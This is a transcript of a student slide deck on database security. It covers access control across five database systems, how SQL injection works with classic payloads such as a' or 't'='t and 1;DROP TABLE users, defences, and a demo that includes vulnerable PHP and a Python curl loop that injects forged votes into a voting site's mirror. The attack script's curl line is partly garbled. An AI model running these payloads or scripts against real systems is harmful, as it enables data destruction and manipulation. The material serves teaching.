Database Security - PowerPoint PPT Presentation

Slides: 52
Provided by: natprak

Transcript and Presenter's Notes

Title: Database Security

1
Database Security
  • Types of attacks and mitigation strategies

Group Members: Tushar Sugandhi, Natthapol Prakongpan, Travis Whilden, Brendan Kohlar, Jonathan Reitnauer
2
Database Access Control
  • Part I

3
Review Databases
  • IBM DB2
  • Oracle
  • Microsoft SQL Server
  • MySQL
  • PostgreSQL

4
Security Mechanisms
  • Authentication
      • Who is allowed access to the instance and/or
        database
      • Where and how a user's password will be verified
  • Authorization
      • The authority level that a user is granted
      • The commands that a user is allowed to run
      • The data that a user is allowed to read and/or
        alter
      • The database objects a user is allowed to create,
        alter, and/or drop
  • Privileges
      • Granular authorization

5
IBM DB2 Authentication
  • Works closely with the security features of the
    underlying operating system to verify user IDs
    and passwords.
  • Can use Kerberos to authenticate users.

6
IBM DB2 Authorization
  • Determine the operations that users and/or groups
    can perform.
  • Determine the data objects that users can access.
  • Five authority levels
      • SYSADM
      • SYSCTRL
      • SYSMAINT
      • DBADM
      • LOAD

7
IBM DB2 Privileges
  • More granular than authorities.
  • Can be assigned to users and/or groups.
  • Help define the objects that a user can create or
    drop.
  • Help define the commands that a user can use to
    access objects (tables, views, indexes, packages).

8
Oracle Security
  • Authentication (Identity Management)
  • Virtual Private Database
  • Oracle Label Security
  • Row Level Authentication

9
Oracle Identity Management
  • LDAP Directory Service
  • Directory integration and provision services
  • Authentication and authorization services
  • Certificate authority (CA)

10
Oracle Virtual Private Database
  • Allows a policy to be associated with specific
    columns in tables.
  • Relevant Column and Masking

11
Oracle Label Security
  • Provides a secure engine and data dictionary for
    managing access to data using sensitivity labels.
  • Row-level security can be achieved with no
    programming required.
  • Sensitivity labels are used to determine a user's
    ability to view and update data.

12
Oracle Label Security
13
Microsoft SQL Server
  • Authentication
  • Access Permission
  • Roles

14
MS SQL Authentication
  • Two methods for user authentication
  • Windows authentication
      • Default and preferred
      • Secure authentication with the underlying operating
        system
  • SQL Server authentication
      • Strongly discouraged
      • Not as secure (clear-text password)

15
MS SQL Access Permission
  • Statement Permissions

16
MS SQL Access Permission
  • Object Permissions

17
MS SQL Roles
20
MySQL
  • Limited Security Features
  • Authentication
  • Permission

21
MySQL Authentication
  • User table/grant table in the master database.
  • Stored in plaintext.
  • Can be viewed by anyone if not configured properly.
  • No ties to the OS.
  • MySQL's root has no password by default.

22
MySQL Permission
  • Table level control
  • Column level control
  • No row level control

24
PostgreSQL Authentication
  • Trust Authentication
      • OS-based
  • Password Authentication
      • md5, crypt, or password through a user table
  • Kerberos Authentication
      • Kerberos auth. server
  • Ident-based Authentication
      • Username, password, machine, OS.
  • Pluggable Authentication Module (PAM)
      • Custom authentication method.

25
PostgreSQL Permission
  • Read
      • SELECT
  • Append
      • INSERT
  • Write
      • UPDATE/DELETE
  • Rules
      • Allows a user to modify permissions on a database.
  • Super user

28
Features Comparison
29
SQL INJECTION ATTACKS
Part II
  • THE BASICS

30
What is SQL Injection?
  • A security vulnerability exploiting the
    application layer of the database
  • Improperly handled user input injected into DBMS
    as SQL statements

31
Where is it Done?
  • Potentially any field requiring user input!
  • The user name or password field of a login form
    is the location most commonly associated with
    SQL injection

32
Specifically
  • SQL Injection attacks can be broken down into the
    exploitation of two vulnerabilities
  • Improper removal of escape characters
  • Weak type enforcement

33
Vulnerability: Escape Characters
  • When escape characters used in a SQL query/command
    are not properly filtered from user input
  • Triggers an escape sequence from the current
    query, such as setting a dummy value equal to
    itself
  • The statement X = X is always true

34
Example: Escape Characters Exploit
  • Application prompts user for userName
  • statement = "SELECT * FROM users WHERE name = '" +
    userName + "'";
  • User injects partial SQL code into prompt
  • a' or 't'='t
  • statement becomes
  • SELECT * FROM users WHERE name = 'a' or 't'='t'
  • OR condition always returns true

35
Vulnerability: Weak Type Enforcement
  • When type constraints are not properly
    implemented for user input
  • A malicious user supplies input of a data type
    other than the one intended for the field

36
Example: Weak Type Enforcement Exploit
  • Application prompts user for a numeric value for
    row selection in the following code
  • statement = "SELECT * FROM data WHERE id = " +
    a_variable + ";";
  • User injects string statement into prompt
  • 1;DROP TABLE users
  • statement becomes
  • SELECT * FROM data WHERE id = 1;DROP TABLE users
  • Execution deletes users table from database
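
To make the two injections from slides 34 and 36 concrete, here is an added example (not code from the slides) that assembles both statements exactly as the slides do, by concatenating the user's input into the SQL text, and runs them against a constructed in-memory SQLite database with a users table and a data table. The table contents, the names fresh_db, lookup_user and select_data, and the use of executescript to stand in for a DBMS that executes batched statements are all assumptions of this example.

```python
import sqlite3

# Constructed sample data (an assumption of this example, not from the slides).
def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'pw1'), ('bob', 'pw2');
        CREATE TABLE data (id INTEGER, payload TEXT);
        INSERT INTO data VALUES (1, 'one'), (2, 'two');
    """)
    return db

# Slide 34: the statement is assembled by concatenating the user's input
# into the SQL text; nothing is escaped or checked.
def build_user_query(user_name):
    return "SELECT * FROM users WHERE name = '" + user_name + "'"

# Slide 36: the numeric row selector is concatenated in the same way.
def build_data_query(a_variable):
    return "SELECT * FROM data WHERE id = " + a_variable + ";"

def lookup_user(db, user_name):
    return db.execute(build_user_query(user_name)).fetchall()

def select_data(db, a_variable):
    # executescript runs every statement in the string, which is what a DBMS
    # that accepts batched statements does with the slide's input. A plain
    # execute() in sqlite3 would refuse the second statement.
    db.executescript(build_data_query(a_variable))

def table_exists(db, name):
    row = db.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None

def demo():
    db = fresh_db()
    # Escape-character case: the quote closes the literal and the OR clause
    # makes the WHERE condition true for every row.
    rows = lookup_user(db, "a' or 't'='t")
    # Weak-type case: the semicolon ends the SELECT and the DROP runs too.
    select_data(db, "1;DROP TABLE users")
    return len(rows), table_exists(db, "users")

if __name__ == "__main__":
    matched, users_still_exists = demo()
    print("rows matched by a' or 't'='t :", matched)
    print("users table still exists     :", users_still_exists)
```

Running demo() returns (2, False): the escape-character input matches every user because 't'='t' is always true, and the weak-type input removes the users table because the second statement is executed as well.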

37
Protection From Attack
  • Sanitize the data
  • Secure the application
  • Safeguard the input
  • Use stored procedures

38
Protection: Sanitize the Data
  • More than simply adding backslashes!
  • Need a default-deny regular expression to filter
    through only desired characters
  • s/[^0-9a-zA-Z]//g returns only alphanumeric
    values
  • Strip quotation marks

39
Protection: Secure the Application
  • People are the weakest link
  • Limit access to only those who need it!
  • Set each individual's access to the lowest required
    permissions

40
Protection: Safeguard the Input
  • Check your database interface for input handling
    functions
  • Proper quote handling in string parsing
  • Deal with backslashes accordingly

41
Protection: Use Stored Procedures
  • A viable alternative
  • Resolves issues with dynamic input
  • Tailored to the specific needs of the database
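
As an added example (not part of the slides), the following Python applies the protections from slides 38 and 40 to the same two inputs used in the attack examples: the default-deny filter s/[^0-9a-zA-Z]//g written with Python's re module, integer type enforcement for the numeric row-selection field, and the database interface's own parameter handling (? placeholders in sqlite3) in place of string concatenation. The table contents and the function names sanitize_alnum, require_alnum, require_int, lookup_user and select_data are this example's assumptions.

```python
import re
import sqlite3

# Slide 38: default-deny filter, the Python form of s/[^0-9a-zA-Z]//g.
# It strips every character outside the allowed set instead of rejecting.
NOT_ALNUM = re.compile(r"[^0-9a-zA-Z]")

def sanitize_alnum(value):
    return NOT_ALNUM.sub("", value)

# Stricter variant: reject rather than strip, so the caller learns that the
# input did not have the expected shape.
def require_alnum(value):
    if NOT_ALNUM.search(value):
        raise ValueError("input contains characters outside [0-9a-zA-Z]")
    return value

# Type enforcement for the numeric row-selection field from slide 36.
def require_int(value):
    if not re.fullmatch(r"-?[0-9]+", value.strip()):
        raise ValueError("not an integer: %r" % (value,))
    return int(value)

# Constructed sample data (an assumption of this example, not from the slides).
def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'pw1'), ('bob', 'pw2'), ('O''Brien', 'pw3');
        CREATE TABLE data (id INTEGER, payload TEXT);
        INSERT INTO data VALUES (1, 'one'), (2, 'two');
    """)
    return db

# Slide 40: let the database interface handle quoting. With ? placeholders
# sqlite3 sends the value separately from the SQL text, so a quote inside
# the value never terminates the string literal.
def lookup_user(db, user_name):
    return db.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()

def select_data(db, a_variable):
    return db.execute(
        "SELECT * FROM data WHERE id = ?", (require_int(a_variable),)
    ).fetchall()

def table_exists(db, name):
    row = db.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None

def demo():
    db = fresh_db()
    results = {
        "sanitized_payload": sanitize_alnum("a' or 't'='t"),
        "rows_for_payload": len(lookup_user(db, "a' or 't'='t")),
        "rows_for_obrien": len(lookup_user(db, "O'Brien")),
    }
    try:
        select_data(db, "1;DROP TABLE users")
        results["drop_rejected"] = False
    except ValueError:
        results["drop_rejected"] = True
    results["users_intact"] = table_exists(db, "users")
    results["rows_for_id_1"] = len(select_data(db, "1"))
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Stripping changes the data rather than rejecting it: O'Brien becomes OBrien, so the filter alone would break a legitimate lookup, whereas the parameterized query finds that row with the apostrophe intact and still returns nothing for the a' or 't'='t payload. For fields with a known format, rejecting (require_alnum, require_int) is the safer default, and parameters handle the quoting for everything else.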

42
DEMO
Part III
43
SQL Injection Demo
  • Attack a real website using SQL injection

44
SQL Injection Demo
  • Bestthing.info: Comparing apples to oranges and
    oranges to racecars.
  • User-driven content with database backend
  • Quest to find the best thing ever
  • Mirror of the site at injection.pycoder.net

47
Plan of attack
  • Put a phrase at the top of the Best phrases
  • Must get around the protection against duplicate
    IP addresses.

48
Site Code
HTML:
<form method="post" action="/">
  <div>
    <input name="tid0" value="27356" type="hidden" />
    <input name="tid1" value="35705" type="hidden" />
    <input name="A" type="submit" value="Having a funny hat" /> or
    <input name="B" type="submit" value="Bs" />
    <br /><br />
    <input type="submit" name="d" type="submit" value="Report this pair as a duplicate." />
  </div>
</form>

PHP:
// tid0 and tid1 are taken straight from the POST body and concatenated
// into the SQL text with no escaping or type check
mysql_query('INSERT INTO votes (ip,time,tid0,tid1,vote) VALUES ('
    .ip2long($_SERVER['REMOTE_ADDR']).',now(),'
    .$_POST['tid0'].','.$_POST['tid1'].','
    .(isset($_POST['A'])?1:0).')');
if(mysql_affected_rows()>0) {
    mysql_query('UPDATE thing SET votesFor=votesFor+'.$forA.', votesTotal=votesTotal+1 WHERE tid='.$o);
    mysql_query('UPDATE thing SET votesFor=votesFor+'.($forA?0:1).', votesTotal=votesTotal+1 WHERE tid='.$t);
}
49
Attack Code
Python Script:
#!/usr/bin/python
import random, commands
# pool of random values; each round draws one not used before
x = [random.randint(4000,400000)]
for n in range(600):
    while True:
        p = random.randint(4000,400000)
        if not p in x:
            x.append(p)
            break
    # curl arguments reproduced as they appear in the slide transcript;
    # the tid1 argument is garbled in the extraction
    commands.getoutput((r"curl -d tid0=%i,%i,1\)\ -d tid1-1\ or\ rthing\'test\' -d B=submit http://injection.pycoder.net") % (x[-2],x[-1]))
51
Thank you !!!